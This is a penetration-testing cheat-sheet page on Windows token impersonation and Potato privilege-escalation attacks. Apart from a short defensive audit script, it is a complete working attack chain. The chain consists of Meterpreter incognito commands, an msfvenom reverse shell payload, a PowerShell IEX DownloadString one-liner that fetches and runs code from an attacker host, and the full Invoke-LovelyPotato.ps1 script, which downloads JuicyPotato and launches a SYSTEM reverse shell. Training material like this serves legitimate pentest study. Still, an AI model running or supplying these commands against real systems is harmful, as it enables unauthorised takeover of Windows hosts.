# Token Impersonation and Potato Attacks

## What are Tokens?

**Tokens** are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think **cookies** for computers.

There are two types of tokens:

* **Delegate**
  * Created for logging into a machine or using Remote Desktop
  * Common
* **Impersonate**
  * "Non-interactive" such as attaching a network drive or a domain logon script
  * Less common

## Enumeration

Check user privilege:

```powershell
whoami /priv
```

If `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` is enabled, the victim machine is vulnerable to **token impersonation** and **Potato attacks**. For example:

![SeImpersonatePrivilege enabled](/files/Eru28NuhAMWRJMHcdmNc)

{% hint style="info" %}

* **Service accounts** usually have `SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege` enabled.
* **User accounts** usually have `SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege` disabled.
{% endhint %}
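The enumeration above only tells you about the token you currently hold. The following audit function, added here and not part of the original notes, reports the same two privileges from the defender's side: whether they are enabled on the current token (parsed from `whoami /priv /fo csv`), which principals hold them host-wide (from a `secedit` export of the local security policy, which needs an elevated prompt), and the OS build number, since the original JuicyPotato technique stops working from build 17763 (Windows 10 1809 / Server 2019). The function name and the output property names are my own choice.

```powershell
# Added audit example (not from the original notes). Reports who holds the two
# impersonation-related privileges on this host and whether the current token
# has them enabled. Function and property names are assumptions of this example.
function Test-ImpersonationExposure {
    [CmdletBinding()]
    param()

    $watched = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')

    # 1. Privileges on the current token. whoami's CSV output has the columns
    #    "Privilege Name","Description","State"; a privilege that is not on the
    #    token at all does not appear in the list.
    $tokenPrivs = whoami /priv /fo csv | ConvertFrom-Csv |
        Where-Object { $watched -contains $_.'Privilege Name' }
    $enabledOnToken = @($tokenPrivs |
        Where-Object { $_.State -eq 'Enabled' } |
        ForEach-Object { $_.'Privilege Name' })

    # 2. Host-wide assignment from the local security policy. secedit writes a
    #    UTF-16 .inf whose [Privilege Rights] section has lines such as
    #    "SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20".
    $holders = @{}
    $tmp = Join-Path $env:TEMP ("rights_{0}.inf" -f [guid]::NewGuid())
    try {
        $null = secedit /export /cfg $tmp /areas USER_RIGHTS /quiet
        if (Test-Path $tmp) {
            foreach ($line in Get-Content $tmp) {
                if ($line -match '^(Se\w+Privilege)\s*=\s*(.*)$') {
                    $name  = $Matches[1]
                    $value = $Matches[2]
                    if ($watched -contains $name) {
                        $holders[$name] = @($value -split ',' | ForEach-Object {
                            $sid = $_.Trim().TrimStart('*')
                            try {
                                $id = New-Object System.Security.Principal.SecurityIdentifier($sid)
                                $id.Translate([System.Security.Principal.NTAccount]).Value
                            } catch {
                                $sid   # unresolvable SID: keep the raw value
                            }
                        })
                    }
                }
            }
        } else {
            $holders['error'] = 'secedit export failed (run from an elevated prompt)'
        }
    } finally {
        Remove-Item $tmp -ErrorAction SilentlyContinue
    }

    # 3. OS build. JuicyPotato's original DCOM technique does not work from
    #    build 17763 (Windows 10 1809 / Server 2019) onwards, so the build
    #    number is part of the risk picture even when the privilege is present.
    $build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber

    [PSCustomObject]@{
        User                  = (whoami)
        EnabledOnCurrentToken = $enabledOnToken
        HostWideHolders       = $holders
        OSBuild               = $build
        PreHardeningBuild     = ($build -lt 17763)
        CurrentTokenAtRisk    = ($enabledOnToken.Count -gt 0)
    }
}

Test-ImpersonationExposure | Format-List
```

Run it from an elevated PowerShell to get the host-wide list; as a normal user the current-token part still works and `HostWideHolders` will carry the error message instead. Expect `NT AUTHORITY\SERVICE`, `LOCAL SERVICE`, `NETWORK SERVICE` and `Administrators` among the holders by default, which is why the notes above say service accounts usually have the privilege: any custom service account lands in the SERVICE group when its service starts.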

## Token Impersonation (Meterpreter)

If we get a Meterpreter session, use the following commands to get a SYSTEM shell. Note the doubled backslash in the token name: the Meterpreter console treats a single backslash as an escape character, so `NT AUTHORITY\SYSTEM` must be typed as `NT AUTHORITY\\SYSTEM`.

```bash
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > shell
```

## Cheat Code: Potato Attacks

{% hint style="info" %}
Many Windows machines are vulnerable to Potato Attacks, so I call this attack the "cheat code" in Windows privilege escalation.
{% endhint %}

For potato attacks, I recommend **Lovely Potato**, which is an automated version of Juicy Potato. Here is the GitHub repo of Lovely Potato:

{% embed url="https://github.com/TsukiCTF/Lovely-Potato" %}
Lovely Potato
{% endembed %}

Setup:

```shell
cd /usr/share/windows-resources
git clone https://github.com/TsukiCTF/Lovely-Potato.git
cd Lovely-Potato
```

Open `Invoke-LovelyPotato.ps1` in text editor and modify these two variables:

```powershell
$RemoteDir = "http://<kali_ip>"
$LocalPath = "<writable_path_on_victim_machine>"
```

In the directory `/usr/share/windows-resources/Lovely-Potato/`, create a msfvenom reverse shell payload. The output file must be named `meterpreter.exe`, because that is the name `Invoke-LovelyPotato.ps1` downloads:

```shell
msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<choose_a_port> -f exe -o meterpreter.exe
```

Start a web server:

```shell
updog
```

Start a listener (`rev` is presumably the author's own shell alias for a listener; a plain `nc -nvlp <the_port_you_chose>` does the same job):

```shell
rev <the_port_you_chose>
```

On the Windows client, start PowerShell and run `Invoke-LovelyPotato.ps1` remotely via the `DownloadString` method:

```powershell
powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://<kali_ip>/Invoke-LovelyPotato.ps1')"
```

{% hint style="warning" %}
**Wait 10 minutes** for a reverse shell running as `NT AUTHORITY\SYSTEM` (the script sleeps 600 seconds while the CLSID test runs).
{% endhint %}

For completeness, here is the content of `Invoke-LovelyPotato.ps1`:

```powershell
# Configuration
$RemoteDir = "http://<kali_ip>"
$LocalPath = "c:\windows\system32\spool\drivers\color"

# Download necessary files for exploitation
(New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe")

# Enumerate CLSIDs
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
$CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null}
$CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii
Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath

# Find System CLSIDs
Start-Sleep -s 600
$SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]}

# Launch Juicy Potato
$SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"}
```

We can do this manually as well. On Kali, make sure your current working directory has the following files:

* `JuicyPotato-Static.exe`
* `test_clsid.bat`
* `meterpreter.exe`

Now start an HTTP server on this directory. On Windows, set `$RemoteDir` and `$LocalPath` as in the script above, then transfer these three files:

```powershell
(New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe")
```

Enumerate CLSIDs:

```powershell
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
$CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null}
$CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii
Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath
```

Find system CLSIDs:

```powershell
Start-Sleep -s 600
$SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]}
```

After the 10-minute sleep, launch Juicy Potato:

```powershell
$SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"}
```

Now we should get a SYSTEM reverse shell on Kali.
